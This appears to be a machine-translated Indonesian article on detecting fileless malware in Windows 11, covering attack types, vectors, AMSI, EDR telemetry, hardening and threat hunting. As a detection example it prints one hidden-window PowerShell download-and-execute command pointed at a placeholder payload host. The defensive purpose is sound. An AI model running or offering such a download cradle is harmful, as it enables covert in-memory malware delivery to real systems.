Cara mendeteksi malware tanpa file berbahaya di Windows 11

¿Bagaimana cara mendeteksi malware tanpa file yang berbahaya? Aktivitas serangan tanpa file telah meningkat secara signifikan, dan untuk memperburuk keadaan, Windows 11 tidak kebalPendekatan ini melewati disk dan bergantung pada memori serta alat sistem yang sah; itulah sebabnya program antivirus berbasis tanda tangan sulit. Jika Anda mencari cara yang andal untuk mendeteksinya, jawabannya terletak pada kombinasi telemetri, analisis perilaku, dan kontrol Windows.

Dalam ekosistem saat ini, kampanye yang menyalahgunakan PowerShell, WMI, atau Mshta hidup berdampingan dengan teknik yang lebih canggih seperti injeksi memori, persistensi "tanpa menyentuh" ​​disk, dan bahkan penyalahgunaan firmwareKuncinya adalah memahami peta ancaman, fase serangan, dan sinyal apa yang ditinggalkannya bahkan ketika semuanya terjadi di dalam RAM.

Apa itu malware tanpa file dan mengapa hal itu menjadi perhatian di Windows 11?

Ketika kita berbicara tentang ancaman "tanpa file", kita mengacu pada kode berbahaya yang Anda tidak perlu menyetorkan eksekusi baru dalam sistem berkas untuk beroperasi. Biasanya disuntikkan ke dalam proses yang sedang berjalan dan dieksekusi dalam RAM, mengandalkan penerjemah dan biner yang ditandatangani oleh Microsoft (misalnya, PowerShell, WMI, rundll32, mshtaIni mengurangi jejak Anda dan memungkinkan Anda melewati mesin yang hanya mencari file mencurigakan.

Bahkan dokumen kantor atau PDF yang mengeksploitasi kerentanan untuk meluncurkan perintah dianggap sebagai bagian dari fenomena tersebut, karena mengaktifkan eksekusi dalam memori tanpa meninggalkan biner yang berguna untuk analisis. Penyalahgunaan makro dan DDE Di Office, karena kode berjalan dalam proses yang sah seperti WinWord.

Penyerang menggabungkan rekayasa sosial (phishing, tautan spam) dengan jebakan teknis: klik pengguna memulai rantai di mana skrip mengunduh dan mengeksekusi muatan akhir dalam memori, menghindari meninggalkan jejak pada disk. Sasarannya beragam, mulai dari pencurian data, eksekusi ransomware, hingga pergerakan lateral diam-diam.

Tipologi berdasarkan jejak dalam sistem: dari 'murni' hingga hibrida

Untuk menghindari konsep yang membingungkan, ada baiknya memisahkan ancaman berdasarkan tingkat interaksinya dengan sistem berkas. Kategorisasi ini memperjelas apa yang bertahan, di mana kode itu berada, dan apa tanda-tanda yang ditinggalkannya?.

Tipe I: tidak ada aktivitas file

Malware tanpa file sama sekali tidak menulis apa pun ke disk. Contoh klasiknya adalah mengeksploitasi kerentanan jaringan (seperti vektor EternalBlue di masa lalu) untuk mengimplementasikan pintu belakang yang berada di memori kernel (seperti kasus DoublePulsar). Di sini, semuanya terjadi di RAM dan tidak ada artefak di sistem berkas.

Pilihan lainnya adalah mengontaminasi firmware komponen: BIOS/UEFI, adaptor jaringan, periferal USB (teknik seperti BadUSB), atau bahkan subsistem CPU. Masalah ini tetap ada meskipun sudah di-restart dan diinstal ulang, dengan kesulitan tambahan yang Beberapa produk memeriksa firmwareIni adalah serangan yang rumit, jarang terjadi, tetapi berbahaya karena sifatnya yang tersembunyi dan tahan lama.

Tipe II: Aktivitas pengarsipan tidak langsung

Di sini, malware tidak "meninggalkan" file eksekusinya sendiri, tetapi menggunakan kontainer yang dikelola sistem yang pada dasarnya disimpan sebagai berkas. Misalnya, pintu belakang yang menanamkan perintah powershell di repositori WMI dan memicu eksekusinya dengan filter peristiwa. Anda dapat menginstalnya dari baris perintah tanpa menghapus biner, tetapi repositori WMI berada di disk sebagai basis data yang sah, sehingga sulit dibersihkan tanpa memengaruhi sistem.

Dari sudut pandang praktis, mereka dianggap tanpa file, karena kontainer tersebut (WMI, Registry, dll.) Ini bukan sebuah eksekusi yang dapat dideteksi secara klasik Dan pembersihannya tidaklah mudah. ​​Hasilnya: persistensi yang tersembunyi dengan sedikit jejak "tradisional".

Tipe III: Membutuhkan file untuk berfungsi

Beberapa kasus mempertahankan persistensi 'tanpa file' Pada tingkat logika, mereka membutuhkan pemicu berbasis berkas. Contoh tipikal adalah Kovter: ia mendaftarkan kata kerja shell untuk ekstensi acak; ketika berkas dengan ekstensi tersebut dibuka, skrip kecil menggunakan mshta.exe diluncurkan, yang merekonstruksi string berbahaya dari Registri.

Triknya adalah bahwa file "umpan" dengan ekstensi acak ini tidak mengandung muatan yang dapat dianalisis, dan sebagian besar kode berada di pendaftaran (wadah lain). Itulah sebabnya mereka dikategorikan sebagai tanpa file dalam hal dampak, meskipun secara tegas mereka bergantung pada satu atau lebih artefak disk sebagai pemicu.

Vektor dan 'inang' infeksi: tempat masuknya dan tempat bersembunyinya

Untuk meningkatkan deteksi, penting untuk memetakan titik masuk dan inang infeksi. Perspektif ini membantu merancang kontrol tertentu Prioritaskan telemetri yang tepat.

eksploitasi

• Berbasis file (Tipe III): Dokumen, file yang dapat dieksekusi, berkas Flash/Java lama, atau berkas LNK dapat memanfaatkan peramban atau mesin yang memprosesnya untuk memuat shellcode ke dalam memori. Vektor pertama adalah berkas, tetapi muatannya berpindah ke RAM.
• Berbasis jaringan (Tipe I): Paket yang mengeksploitasi kerentanan (misalnya, di SMB) mencapai eksekusi di userland atau kernel. WannaCry mempopulerkan pendekatan ini. Beban memori langsung tanpa file baru.

Perangkat keras

• Perangkat (Tipe I): Firmware disk atau kartu jaringan dapat diubah dan kode dapat dimasukkan. Sulit diperiksa dan tetap ada di luar OS.
• CPU dan subsistem manajemen (Tipe I): Teknologi seperti ME/AMT Intel telah menunjukkan jalur menuju Jaringan dan eksekusi di luar OSSerangannya pada level sangat rendah, dengan potensi siluman yang tinggi.
• USB (Tipe I): BadUSB memungkinkan Anda memprogram ulang drive USB untuk menyamar sebagai keyboard atau NIC dan meluncurkan perintah atau mengalihkan lalu lintas.
• BIOS / UEFI (Tipe I): pemrograman ulang firmware berbahaya (kasus seperti Mebromi) yang berjalan sebelum Windows dimulai.
• Hypervisor (Tipe I): Menerapkan mini-hypervisor di bawah OS untuk menyembunyikan keberadaannya. Jarang, tetapi sudah diamati dalam bentuk rootkit hypervisor.

Eksekusi dan injeksi

• Berbasis file (Tipe III): EXE/DLL/LNK atau tugas terjadwal yang meluncurkan injeksi ke dalam proses yang sah.
• Macro (Tipe III): VBA di Office dapat mendekode dan mengeksekusi muatan, termasuk ransomware lengkap, dengan persetujuan pengguna melalui penipuan.
• Script (Tipe II): PowerShell, VBScript atau JScript dari file, baris perintah, layanan, Pendaftaran atau WMIPenyerang dapat mengetik skrip dalam sesi jarak jauh tanpa menyentuh disk.
• Rekaman boot (MBR/Boot) (Tipe II): Keluarga seperti Petya menimpa sektor boot untuk mengambil alih kendali saat startup. Sektor boot berada di luar sistem berkas, tetapi dapat diakses oleh OS dan solusi modern yang dapat memulihkannya.

Cara kerja serangan tanpa file: fase dan sinyal

Meskipun tidak meninggalkan berkas yang dapat dieksekusi, kampanye mengikuti logika bertahap. Memahaminya memungkinkan pemantauan. peristiwa dan hubungan antar proses yang meninggalkan bekas.

• Akses awalSerangan phishing menggunakan tautan atau lampiran, situs web yang disusupi, atau kredensial yang dicuri. Banyak rantai serangan dimulai dengan dokumen Office yang memicu perintah PowerShell.
• Kegigihan: pintu belakang melalui WMI (filter dan langganan), Kunci eksekusi registri atau tugas terjadwal yang meluncurkan kembali skrip tanpa file berbahaya baru.
• EksfiltrasiSetelah informasi dikumpulkan, informasi tersebut dikirim keluar jaringan menggunakan proses tepercaya (browser, PowerShell, bitsadmin) untuk mencampur lalu lintas.

Pola ini sangat berbahaya karena indikator serangan Mereka bersembunyi dalam keadaan normal: argumen baris perintah, rangkaian proses, koneksi keluar yang tidak normal, atau akses ke API injeksi.

Teknik umum: dari memori hingga perekaman

Para aktor mengandalkan berbagai macam metode yang mengoptimalkan kemampuan siluman. Mengetahui fitur-fitur yang paling umum akan membantu mengaktifkan deteksi yang efektif.

• Bertempat tinggal dalam memori: Memuat muatan ke dalam ruang proses tepercaya yang menunggu aktivasi. rootkit dan hook Pada intinya, mereka meningkatkan tingkat penyembunyian.
• Kegigihan dalam RegistriSimpan blob terenkripsi dalam kunci dan rehidrasi dari peluncur yang sah (mshta, rundll32, wscript). Penginstal sementara dapat merusak dirinya sendiri untuk meminimalkan jejaknya.
• Phishing kredensialMenggunakan nama pengguna dan kata sandi yang dicuri, penyerang mengeksekusi shell jarak jauh dan menanam akses senyap di Registry atau WMI.
• Ransomware 'Tanpa File'Enkripsi dan komunikasi C2 diatur dari RAM, mengurangi peluang deteksi hingga kerusakan terlihat.
• Peralatan operasi: rantai otomatis yang mendeteksi kerentanan dan menyebarkan muatan hanya memori setelah pengguna mengklik.
• Dokumen dengan kode:makro dan mekanisme seperti DDE yang memicu perintah tanpa menyimpan eksekusi ke disk.

Studi industri telah menunjukkan puncak yang signifikan: pada satu periode di tahun 2018, peningkatan lebih dari 90% dalam serangan berantai berbasis skrip dan PowerShell, tanda bahwa vektor lebih disukai karena efektivitasnya.

Tantangan bagi perusahaan dan pemasok: mengapa pemblokiran tidak cukup

Akan sangat menggoda untuk menonaktifkan PowerShell atau melarang makro selamanya, tetapi Anda akan merusak operasinyaPowerShell adalah pilar administrasi modern dan Office sangat penting dalam bisnis; pemblokiran secara membabi buta seringkali tidak memungkinkan.

Selain itu, ada cara untuk melewati kontrol dasar: menjalankan PowerShell melalui DLL dan rundll32, mengemas skrip ke dalam EXE, Bawa salinan PowerShell Anda sendiri atau bahkan menyembunyikan skrip dalam gambar dan mengekstraknya ke dalam memori. Oleh karena itu, pembelaan tidak dapat hanya didasarkan pada penyangkalan keberadaan alat.

Kesalahan umum lainnya adalah mendelegasikan seluruh keputusan ke cloud: jika agen harus menunggu respons dari server, Anda kehilangan pencegahan waktu nyataData telemetri dapat diunggah untuk memperkaya informasi, tetapi Mitigasi harus terjadi di titik akhir.

Cara mendeteksi malware tanpa file di Windows 11: telemetri dan perilaku

Strategi yang menang adalah memantau proses dan memoriBukan berkas. Perilaku berbahaya lebih stabil daripada bentuk berkas, sehingga ideal untuk mesin pencegahan.

• AMSI (Antarmuka Pemindaian Antimalware)Ia mencegat skrip PowerShell, VBScript, atau JScript, bahkan ketika skrip tersebut dibuat secara dinamis di dalam memori. Sangat baik untuk menangkap string yang dikaburkan sebelum dieksekusi.
• Pemantauan proses: mulai/selesai, PID, orang tua dan anak, rute, baris perintah dan hash, ditambah pohon eksekusi untuk memahami cerita selengkapnya.
• Analisis memori: deteksi injeksi, beban reflektif atau PE tanpa menyentuh disk, dan peninjauan wilayah eksekusi yang tidak biasa.
• Perlindungan sektor pemula: kontrol dan pemulihan MBR/EFI jika terjadi gangguan.

Di ekosistem Microsoft, Defender for Endpoint menggabungkan AMSI, pemantauan perilakuPemindaian memori dan pembelajaran mesin berbasis cloud digunakan untuk meningkatkan deteksi terhadap varian baru atau yang telah dikaburkan. Vendor lain menggunakan pendekatan serupa dengan mesin berbasis kernel.

Contoh korelasi yang realistis: dari dokumen ke PowerShell

Bayangkan sebuah rantai di mana Outlook mengunduh lampiran, Word membuka dokumen, konten aktif diaktifkan, dan PowerShell diluncurkan dengan parameter yang mencurigakan. Telemetri yang tepat akan menunjukkan Garis komando (misalnya, Bypass ExecutionPolicy, jendela tersembunyi), menghubungkan ke domain yang tidak tepercaya dan membuat proses anak yang menginstal dirinya sendiri di AppData.

Agen dengan konteks lokal mampu berhenti dan mundur aktivitas berbahaya tanpa intervensi manual, selain memberi tahu SIEM atau melalui email/SMS. Beberapa produk menambahkan lapisan atribusi akar penyebab (model tipe StoryLine), yang tidak merujuk ke proses yang terlihat (Outlook/Word), melainkan ke utas penuh kejahatan dan asal muasalnya untuk membersihkan sistem secara menyeluruh.

Pola perintah umum yang perlu diperhatikan mungkin terlihat seperti ini: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logika bukanlah rangkaian yang tepat, tapi serangkaian sinyal: melewati kebijakan, jendela tersembunyi, unduhan jelas, dan eksekusi dalam memori.

AMSI, pipeline, dan peran setiap aktor: dari titik akhir hingga SOC

Di luar penangkapan skrip, arsitektur yang kuat mengatur langkah-langkah yang memfasilitasi penyelidikan dan respons. Semakin banyak bukti sebelum mengeksekusi muatan, semakin baik.terbaik

• Intersepsi skripAMSI mengirimkan konten (meskipun konten tersebut dibuat secara spontan) untuk analisis statis dan dinamis dalam jalur malware.
• Peristiwa prosesPID, biner, hash, rute, dan data lainnya dikumpulkan. argumen, membangun pohon proses yang mengarah ke muatan akhir.
• Deteksi dan pelaporanDeteksi ditampilkan pada konsol produk dan diteruskan ke platform jaringan (NDR) untuk visualisasi kampanye.
• Jaminan penggunaBahkan jika skrip disuntikkan ke dalam memori, kerangka kerja AMSI mencegatnya dalam versi Windows yang kompatibel.
• Kemampuan administrator: konfigurasi kebijakan untuk mengaktifkan pemeriksaan skrip, pemblokiran berbasis perilaku dan membuat laporan dari konsol.
• Pekerjaan SOC: ekstraksi artefak (VM UUID, versi OS, jenis skrip, proses inisiator dan induknya, hash dan baris perintah) untuk membuat ulang riwayat dan aturan lift masa depan.

Ketika platform memungkinkan ekspor penyangga memori Terkait dengan eksekusi, peneliti dapat menghasilkan deteksi baru dan memperkaya pertahanan terhadap varian serupa.

Langkah-langkah praktis di Windows 11: pencegahan dan perburuan

Selain memiliki EDR dengan inspeksi memori dan AMSI, Windows 11 memungkinkan Anda menutup ruang serangan dan meningkatkan visibilitas dengan kontrol asli.

• Registrasi dan batasan di PowerShellMengaktifkan Pencatatan Blok Skrip dan Pencatatan Modul, menerapkan mode terbatas jika memungkinkan, dan mengontrol penggunaan Bypass/Tersembunyi.
• Aturan Pengurangan Permukaan Serangan (ASR): : memblokir peluncuran skrip oleh proses Office dan Penyalahgunaan WMI/PSExec jika tidak diperlukan.
• Kebijakan makro kantor: menonaktifkan secara default, penandatanganan makro internal dan daftar kepercayaan yang ketat; memantau aliran DDE lama.
• Audit dan Registri WMI: memantau langganan acara dan kunci eksekusi otomatis (Run, RunOnce, Winlogon), serta pembuatan tugas terjadwal.
• Perlindungan startup: mengaktifkan Secure Boot, memeriksa integritas MBR/EFI dan memvalidasi bahwa tidak ada modifikasi saat startup.
• Penambalan dan pengerasan: menutup kerentanan yang dapat dieksploitasi dalam browser, komponen Office, dan layanan jaringan.
• Kesadaran: melatih pengguna dan tim teknis dalam phishing dan sinyal eksekusi rahasia.

Untuk berburu, fokus pada pertanyaan tentang: membuat proses oleh Office menuju PowerShell/MSHTA, argumen dengan string unduhan/file unduhanSkrip dengan obfuscation yang jelas, injeksi reflektif, dan jaringan keluar ke TLD yang mencurigakan. Periksa kembali sinyal-sinyal ini dengan reputasi dan frekuensi untuk mengurangi noise.

Apa saja yang dapat dideteksi oleh masing-masing mesin saat ini?

Solusi perusahaan Microsoft menggabungkan AMSI, analitik perilaku, memeriksa memori dan perlindungan sektor boot, ditambah model ML berbasis cloud untuk meningkatkan skala terhadap ancaman yang muncul. Vendor lain menerapkan pemantauan tingkat kernel untuk membedakan perangkat lunak berbahaya dari yang tidak berbahaya dengan pengembalian perubahan secara otomatis.

Suatu pendekatan berdasarkan cerita eksekusi Hal ini memungkinkan Anda mengidentifikasi akar permasalahan (misalnya, lampiran Outlook yang memicu rantai) dan memitigasi keseluruhan pohon masalah: skrip, kunci, tugas, dan biner perantara, sehingga Anda tidak terjebak pada gejala yang terlihat.

Kesalahan umum dan cara menghindarinya

Memblokir PowerShell tanpa rencana manajemen alternatif tidak hanya tidak praktis, tetapi juga ada cara untuk memanggilnya secara tidak langsungHal yang sama berlaku untuk makro: Anda harus mengelolanya dengan kebijakan dan tanda tangan, atau bisnis Anda akan terdampak. Lebih baik fokus pada telemetri dan aturan perilaku.

Kesalahan umum lainnya adalah meyakini bahwa memasukkan aplikasi ke dalam daftar putih akan menyelesaikan segalanya: teknologi tanpa file justru bergantung pada hal ini. aplikasi tepercayaKontrol hendaknya mengamati apa yang mereka lakukan dan bagaimana kaitannya, bukan hanya apakah mereka diizinkan.

Dengan semua hal di atas, malware tanpa file tidak lagi menjadi "hantu" ketika Anda memantau apa yang benar-benar penting: perilaku, ingatan dan asal usul dari setiap eksekusi. Menggabungkan AMSI, telemetri proses yang kaya, kontrol Windows 11 asli, dan lapisan EDR dengan analisis perilaku memberi Anda keuntungan. Tambahkan ke dalam persamaan kebijakan realistis untuk makro dan PowerShell, audit WMI/Registri, dan perburuan yang memprioritaskan baris perintah dan pohon proses, dan Anda memiliki pertahanan yang memotong rantai ini sebelum menimbulkan suara.